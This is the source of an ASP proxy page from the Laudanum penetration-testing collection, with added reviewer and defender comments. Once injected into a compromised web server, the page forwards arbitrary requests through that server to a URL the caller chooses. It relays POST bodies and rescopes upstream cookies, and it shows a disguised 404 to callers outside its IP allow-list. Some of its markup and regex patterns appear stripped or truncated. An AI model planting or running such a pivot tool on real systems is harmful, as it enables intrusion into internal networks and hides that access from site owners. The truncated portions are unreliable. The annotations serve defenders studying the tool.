<%@Language="VBScript"%> <%Option Explicit%> <%Response.Buffer = True%> <% ' ******************************************************************************* ' *** ' *** Laudanum Project ' *** A Collection of Injectable Files used during a Penetration Test ' *** ' *** More information is available at: ' *** http://laudanum.secureideas.net ' *** laudanum@secureideas.net ' *** ' *** Project Leads: ' *** Kevin Johnson ' *** ' *** Copyright 2014 by Kevin Johnson and the Laudanum Team ' *** ' ******************************************************************************** ' *** ' *** This file provides access as a proxy. ' *** Written by Tim Medin ' *** ' ******************************************************************************** ' *** This program is free software; you can redistribute it and/or ' *** modify it under the terms of the GNU General Public License ' *** as published by the Free Software Foundation; either version 2 ' *** of the License, or (at your option) any later version. ' *** ' *** This program is distributed in the hope that it will be useful, ' *** but WITHOUT ANY WARRANTY; without even the implied warranty of ' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ' *** GNU General Public License for more details. ' *** ' *** You can get a copy of the GNU General Public License from this ' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 ' *** You can also write to the Free Software Foundation, Inc., Temple ' *** Place - Suite Boston, MA USA. 
' ***
' ***************************************************************************** */

' ***************** Config entries below ***********************

' Reviewer overview (from the code below): the page takes a target URL from the
' "laudurl" query-string or form parameter, fetches it server-side with an
' XMLHTTP COM object, copies the upstream response headers, rewrites src/href
' references (and, in the form patterns, action attributes) so they point back
' at this script, and returns the result to the caller.
' The only access control visible in this file is the source-IP allow-list
' further down; there is no authentication step.
'
' Defender note: observable traits in this code are the "laudurl" parameter on
' requests to the script, outbound HTTP requests originating from the web
' server itself, and a "404 File Not Found" body that echoes the caller's
' address for clients outside the allow-list.

' Define variables
' These are script-level globals; ParseUrl, FullUrl and RewriteHeaders read and
' write several of them directly instead of taking parameters.
Dim allowedIPs
Dim allowed
Dim i
Dim s 'generic string, yeah, I know bad, but at this point I just want it to work
Dim urltemp
Dim urlscheme
Dim urlhost
Dim urlport
Dim urlpath
Dim urlfile
Dim urlquery
Dim http
Dim method
Dim contenttype
Dim stream
Dim regex
Dim body
Dim params

' err_handler: emits a "Fatal Error!" page containing the Err number and
' message. It is declared as a function but assigns no return value.
' NOTE(review): the VBScript Err object documents a Description property;
' Err.Message as used in the page body below should be confirmed.
function err_handler() %> Laudanum ASP Proxy

Fatal Error!

<%=Err.Number%>
<%=Err.Message%>

Copyright © 2014, Kevin Johnson and the Laudanum team.
Written by Tim Medin.
Get the latest version at laudanum.secureideas.net.
<%
end function

' CleanQueryString: rebuilds the incoming query string without the laudurl
' parameter. Returns "" when nothing is left, otherwise "?" followed by the
' remaining key=value pairs joined with "&".
function CleanQueryString
  ' removes laudurl from the querystring
  Dim i
  Dim j
  Dim s
  Dim key
  Dim q

  if len(request.querystring) = 0 then
    CleanQueryString = ""
    exit function
  end if

  ' build the request parameters
  for i = 1 to request.querystring.count
    key = request.querystring.key(i)
    ' (debug, disabled) response.write "key:" & key
    if key = "laudurl" then
      ' if the key is laudurl, we need to check if there is a ? in the string since
      ' it may have its own query string that doesn't get parsed properly.
      s = split(request.querystring("laudurl"), "?")
      if ubound(s) > lbound(s) then
        ' laudurl contains a ?, it must be manually parsed
        ' Only s(1), the text after the first "?", is used, and it is treated
        ' as a single key=value pair.
        key = left(s(1), instr(s(1), "=") - 1)
        q = q & "&" & key & "=" & mid(s(1), len(key) + 2)
      end if
    else
      ' a key may carry several values; each one is appended separately.
      ' Values are appended as returned by request.querystring, with no
      ' re-encoding step in this function.
      for j = 1 to request.querystring(key).count
        ' (debug, disabled) response.write "-value:" & request.querystring(key)(j)
        q = q & "&" & key & "=" & request.querystring(key)(j)
      next
    end if
  next

  ' q always starts with "&" when non-empty; mid(q, 2) drops it
  if len(q) > 0 then
    CleanQueryString = "?" & mid(q, 2)
  else
    CleanQueryString = ""
  end if
end function

' CleanFormValues: returns the raw POST body (request.form) with every
' "laudurl=<value>" pair, and a trailing "&" if present, removed.
function CleanFormValues()
  Dim r
  Set r = New RegExp
  r.IgnoreCase = true
  r.Global = true
  ' remove the laudurl parameter
  r.Pattern = "laudurl=[^&]+($|&)"
  CleanFormValues = r.Replace(request.form, "")
  Set r = nothing
end function

' ParseUrl: reads the target URL from the laudurl parameter (query string
' first, then form body) and splits it into the globals urlscheme, urlhost,
' urlport, urlpath, urlfile and urlquery. All six are set to "" when no URL
' was supplied.
' Security-relevant: nothing in this sub restricts the scheme or the host, so
' the destination of the server-side request is whatever the caller supplies.
sub ParseUrl()
  ' parses the url into the global variables
  ' (urltemp declared here shadows the script-level variable of the same name)
  Dim urltemp
  Dim url

  'get the url, it may be in the querystring for a get or from a form in a post
  url = Request.QueryString("laudurl")
  if url = "" then
    url = Request.Form("laudurl")
  end if

  if url = "" then
    urlscheme = ""
    urlhost = ""
    urlport = ""
    urlpath = ""
    urlfile = ""
    urlquery = ""
    exit sub
  end if

  ' Parse the url and break it into its components
  ' this is done so it can be used to rewrite the page

  ' ensure the url has a scheme, if it doesn't then assume http
  if instr(url,"://") = 0 then url = "http://" + url

  ' Get the scheme
  urlscheme = split(url, "://")(0) & "://"

  ' urltemp is used to hold the remainder of the url as each portion is parsed
  urltemp = mid(url, len(urlscheme) + 1)

  'get the host
  if instr(urltemp, "/") = 0 then
    ' there is no path so all that is left is the host
    ' (in this branch a ":port" suffix, if any, stays inside urlhost)
    urlhost = urltemp
    urlport = ""
    urlpath = "/"
    urlfile = ""
    urlport = ""
  else
    ' there is more than just the hostname remaining
    urlhost = left(urltemp, instr(urltemp, "/") - 1)
    urltemp = mid(urltemp, len(urlhost) + 1)

    ' is there a port
    if instr(urlhost, ":") = 0 then
      ' no port
      urlport = ""
    else
      ' there is a port
      ' NOTE(review): arr is not declared in this sub or among the Dim
      ' statements visible in this file, and the page sets Option Explicit.
      arr = split(urlhost, ":")
      urlhost = arr(0)
      urlport = ":" & arr(1)
    end if

    ' all that is left is the path and the query
    ' is there a query?
    if instr(urltemp, "?") = 0 then
      ' no query
      urlpath = urltemp
      'urlquery = ""
    else
      ' (debug, disabled) Response.Write urltemp
      urlpath = left(urltemp, instr(urltemp, "?") - 1)
      'urlquery = mid(urltemp, instr(urltemp, "?") + 1)
    end if

    if right(urlpath, 1) = "/" then
      urlfile = ""
    else
      ' we need to get the path and the file
      ' urltemp is reused here as an array of path segments
      urltemp = split(urlpath, "/")
      urlfile = urltemp(ubound(urltemp))
      urlpath = left(urlpath, len(urlpath) - len(urlfile))
    end if
  end if

  ' the query part comes from the incoming request, not from the text after
  ' "?" in laudurl (CleanQueryString handles that case itself)
  urlquery = CleanQueryString

  ' (debug, disabled) response.write "scheme: " & urlscheme
  ' (debug, disabled) response.write "host: " & urlhost
  ' (debug, disabled) response.write "port: " & urlport
  ' (debug, disabled) response.write "path: " & urlpath
  ' (debug, disabled) response.write "file: " & urlfile
  ' (debug, disabled) response.write "query: " & urlquery
  ' (debug, disabled) response.write "full: " & FullUrl()
  ' (debug, disabled) response.end
end sub

' FullUrl: concatenates the parsed URL globals back into one string. Returns
' "" when ParseUrl found no laudurl parameter.
function FullUrl()
  FullUrl = urlscheme & urlhost & urlport & urlpath & urlfile & urlquery
end function

' RewriteHeaders: copies the upstream response headers (from the global http
' object) onto this page's response, skipping Content-Type, Content-Length and
' Transfer-Encoding, and removing the domain= and path= attributes from
' Set-Cookie values.
' Security-relevant: with domain/path removed, upstream cookies are no longer
' scoped to the upstream site; presumably the browser then scopes them to the
' host serving this script - confirm against browser behaviour.
sub RewriteHeaders()
  Dim i
  Dim header
  Dim headervalue
  Dim regexdomain
  Dim regexpath

  ' setup a regular expression to clean the cookie's domain and path
  Set regexdomain = New RegExp
  regexdomain.IgnoreCase = true
  regexdomain.Global = true
  ' matches a cookie's domain= attribute up to the next whitespace
  regexdomain.Pattern = "domain=[\S]+"

  Set regexpath = New RegExp
  regexpath.IgnoreCase = true
  regexpath.Global = true
  ' matches a cookie's path= attribute up to the next whitespace
  regexpath.Pattern = "path=[\S]+"

  ' go through each header
  for each i in Split(http.getAllResponseHeaders, vbLf)
    ' Break on the \x0a and remove the \x0d if it exists
    i = Replace(i, vbCr, "")
    ' make sure it is a header and value
    if instr(i, ":") > 0 then
      ' break the response headers into header and value
      header = trim(Left(i, instr(i, ":") - 1))
      header = replace(header, "_", "-")
      headervalue = trim(Right(i, len(i) - instr(i, ":")))

      ' don't add these header types since they are handled automatically
      if lcase(header) <> "content-type" and lcase(header) <> "content-length" and lcase(header) <> "transfer-encoding" then
        if lcase(header) = "set-cookie" then
          ' strip the domain from the cookie
          headervalue = regexdomain.replace(headervalue, "")
          ' strip the path from the cookie
          headervalue = regexpath.replace(headervalue, "")
          headervalue = trim(headervalue)
        end if
        ' every other upstream header, including any security headers the
        ' upstream site sent, is passed through unchanged
        response.AddHeader header, headervalue
      end if
    end if
  next

  Set regexdomain = nothing
  Set regexpath = nothing
end sub

' ---------------------------------------------------------------------------
' Access control: source-IP allow-list
' ---------------------------------------------------------------------------
' TODO: Add authentication support so it will work behind a proxy

' IPs are enterable as individual addresses TODO: add CIDR support
' Entries are compared as exact strings against REMOTE_ADDR below, so an
' address must be written exactly as the server reports it.
allowedIPs = "192.168.0.1,127.0.0.1,::1"

' Just in case you added a space in the line above
allowedIPs = replace(allowedIPS," ","")
'turn it into an array
allowedIPs = split(allowedIPS,",")
'
' make sure the ip is allowed
' allowed starts at 0, i.e. deny by default; it is set to 1 only on an exact
' allow-list match. (The original TODO here still described a testing value
' of 1; the code as shown already uses 0.)
allowed = 0
for i = lbound(allowedIPs) to ubound(allowedIPs)
  ' NOTE(review): REMOTE_ADDR is the address of the connecting peer. If the
  ' site sits behind a reverse proxy or load balancer this is presumably that
  ' device's address rather than the end client's - confirm for the deployment.
  if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then
    allowed = 1
    exit for
  end if
next
' send a 404 if the IP Address is not allowed
if allowed = 0 then
  ' The body written here is the status text followed by the caller's address,
  ' so this response is not the same as the server's own 404 page.
  Response.Status = "404 File Not Found"
  Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR"))
  Response.End
end if

'initialize variables
Set http = nothing
Set regex = nothing
Set stream = nothing

' Define Constants
' useMSXML2 selects which XMLHTTP ProgID is instantiated further down
const useMSXML2 = 0
const chunkSize = 1048576 ' 1MB

' parse the url into its parts
ParseUrl()

' check if there is a valid url
if len(FullUrl) = 0 then
  ' no url to proxy, give `em the boring default page

  ' Default layout of the page
  ' First thing you get when you hit the page without giving it a URL
  ' NOTE(review): the markup of this page looks stripped in this copy; only its
  ' text and a stray "> remain.
%> Laudanum ASP Proxy

Laudanum ASP Proxy

">

Copyright © 2014, Kevin Johnson and the Laudanum team.
Written by Tim Medin.
Get the latest version at laudanum.secureideas.net.
<%
  Response.End()
end if

' Let's get our Proxy on!!!

' define the request type
' The outbound request is made by a COM object created inside the web
' application, so it originates from the web server host.
if useMSXML2 = 1 then
  Set http = Server.CreateObject("MSXML2.XMLHTTP")
else
  Set http = Server.CreateObject("Microsoft.XMLHTTP")
end if

' get the request type
method = Request.ServerVariables("REQUEST_METHOD")

' setup the request; the third argument (False) makes the call synchronous
' the caller's HTTP method is reused as-is for the upstream request
http.Open method, FullUrl, False

' send the request
if method = "POST" then
  ' forward the form body minus the laudurl parameter
  params = CleanFormValues
  http.setRequestHeader "Content-type", "application/x-www-form-urlencoded"
  http.setRequestHeader "Content-length", len(params)
  http.setRequestHeader "Connection", "close"
  http.Send(params)
else
  ' every non-POST method is sent without a body
  http.Send
end if

' Replace the normal headers with the ones from the response
Response.Clear
contenttype = http.getResponseHeader("Content-Type")
Response.ContentType = contenttype

' copy the upstream response headers onto the response sent to the caller
RewriteHeaders()

' how to respond? is it text or is it something else?
if lcase(left(contenttype, 4)) = "text" then
  ' response is text, so references inside it are rewritten to point back at
  ' this script before it is returned

  ' do the rewriting
  body = http.responseText
  Set regex = New RegExp
  regex.IgnoreCase = true
  regex.Global = true

  ' rewrite images and links - absolute reference (value starts with "/")
  s = urlscheme & urlhost & urlport
  regex.Pattern = "((src|href).?=.?['""])(\/[^'""]+['""])"
  body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=" & s & "$3")

  ' rewrite images and links - full reference (value starts with "http")
  regex.Pattern = "((src|href).?=.?['""])(http[^'""]+['""])"
  body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=$3")

  ' rewrite images and links - relative reference (value does not start with "/")
  s = urlscheme & urlhost & urlport & urlpath
  regex.Pattern = "((src|href).?=.?['""])([^\/][^'""]+['""])"
  body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=" & s & "$3")

  ' NOTE(review): the three form patterns below, and possibly their
  ' replacement strings, look truncated in this copy (markup-like text appears
  ' to have been stripped). As shown, each pattern begins with "\]+" and the
  ' value assigned to s is not used by the replacement. Compare against the
  ' upstream file before drawing conclusions from these lines.

  ' rewrite forms - absolute reference
  s = urlscheme & urlhost & urlport
  regex.Pattern = "(\]+action.?=.?['""])(\/[^'""]+)(['""][^\>]*[\>])"
  body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3")

  ' rewrite forms - full reference
  regex.Pattern = "(\]+action.?=.?['""])(http[^'""]+)(['""][^\>]*[\>])"
  body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3")

  ' rewrite forms - relative reference
  s = urlscheme & urlhost & urlport & urlpath
  regex.Pattern = "(\]+action.?=.?['""])([^\/][^'""]+)(['""][^\>]*[\>])"
  body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3")

  Response.Write(body)
  Set regex = nothing
else
  ' some sort of binary response, so stream it
  ' The whole upstream body is first written into an in-memory ADODB.Stream
  ' and then sent to the caller in chunkSize pieces.
  Set stream = nothing
  Set stream = Server.CreateObject("ADODB.Stream")
  stream.Type = 1 'Binary
  stream.Open
  stream.Write http.responseBody
  stream.Position = 0

  ' "\" is integer division; the loop runs (Size \ chunkSize) + 1 times so the
  ' final partial chunk is sent as well
  For i = 0 to stream.Size \ chunkSize
    Response.BinaryWrite(stream.Read(chunkSize))
  next
  Set stream = nothing
end if
Set http = nothing
Response.End

' NOTE(review): no On Error statement is visible in this file, so nothing
' appears to route a runtime error to the lines below, and the Response.End
' above comes before them.
:HandleError
err_handler
%>